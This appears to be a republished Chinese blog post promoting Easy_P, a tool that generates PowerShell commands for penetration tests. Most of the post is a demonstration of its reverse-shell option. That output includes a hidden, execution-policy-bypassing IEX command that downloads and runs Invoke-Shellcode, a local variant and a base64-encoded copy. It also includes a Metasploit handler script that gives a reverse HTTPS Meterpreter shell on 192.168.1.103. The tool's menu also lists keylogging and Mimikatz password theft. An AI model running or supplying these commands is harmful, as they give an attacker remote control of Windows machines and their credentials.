powershell功能强大,不仅仅体现在系统管理上。在日常的渗透过程中,为了规避防火墙等原因,我们需要一些powershell脚本来辅助我们完成渗透测试工作,对于不熟悉powershell脚本的来说,有一定的难度。还好有人已经想到了这一点,写了个辅助的python脚本,可以自动生成一些常用的powershell。
Easy_P github地址:https://github.com/cheetz/Easy-P.git
首先看简介
Easy_P is a tool used for showing a user which PowerShell scripts to use in a penetration test, depending on the users needs.
PowerShell/WMI Generator
=========================================================
___________ __________
_ _____/____ _________.__. ______
| __)___ / ___< | | ______ | ___/
| / __ ____ ___ | /_____/ | |
/_______ (____ /____ >/ ____| |____|
/ / / /
Easy_P | A Powershell / WMI Command Generator.
Written by Peter Kim <Author, The Hacker Playbook>
<CEO, Secure Planet LLC>
==================================================Easy-P==
-----------------------------------------------------
[1] Privilege Escalation
[2] Lateral Movement
[3] Keylogging
[4] PowerShell Meterpreter
[5] Change Users Execution Policy
[6] Powershell 101
[7] Base64 Encode a PowerShell Script
[8] Mimikatz - Passwords from Memory
[99] Exit/Quit
-----------------------------------------------------
我们选择4,生成一个反弹的meterpreter脚本
Select An Option: 4
[*]PowerShell Metasploit Meterpreter Reverse HTTPS Shell. Original: https://raw.github.com/mattifestation/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1
LHOST: 192.168.1.103
LPORT: 55555
[*]Download from internet and execute:
Powershell.exe -NoP -NonI -W Hidden -Exec Bypass IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/cheetz/PowerSploit/master/CodeExecution/Invoke--Shellcode.ps1'); Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.103 -Lport 55555 -Force
[*]Run from a local copy of the script:
powershell.exe -exec bypass -Command "& {Import-Module .Invoke-Shellcode.ps1; Invoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 192.168.1.103 -Lport 55555 -Force}"
[*]Base64 encoded version download and execute:
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AYwBoAGUAZQB0AHoALwBQAG8AdwBlAHIAUwBwAGwAbwBpAHQALwBtAGEAcwB0AGUAcgAvAEMAbwBkAGUARQB4AGUAYwB1AHQAaQBvAG4ALwBJAG4AdgBvAGsAZQAtAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkAOwAgAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUAIAAtAFAAYQB5AGwAbwBhAGQAIAB3AGkAbgBkAG8AdwBzAC8AbQBlAHQAZQByAHAAcgBlAHQAZQByAC8AcgBlAHYAZQByAHMAZQBfAGgAdAB0AHAAcwAgAC0ATABoAG8AcwB0ACAAMQA5ADIALgAxADYAOAAuADEALgAxADAAMwAgAC0ATABwAG8AcgB0ACAANQA1ADQANgAgAC0ARgBvAHIAYwBlAA==
[*]Listner Resource Script (listener.rc) - Save the following to a file called listener.rc on your Kali box and load your handler with msfconsole -r listener.rc
use multi/handler
set payload windows/meterpreter/reverse_https
set LHOST 192.168.1.103
set LPORT 55555
set ExitOnSession false
exploit -j
可以看到生成了三种格式的powershell脚本,网络下载执行,本地执行,base64编码格式,其他的功能大家可以自行研究,限于篇幅原因,不多累赘。
本文始发于微信公众号(milsec):工具推荐:Easy_P powershell 常用代码生成辅助工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论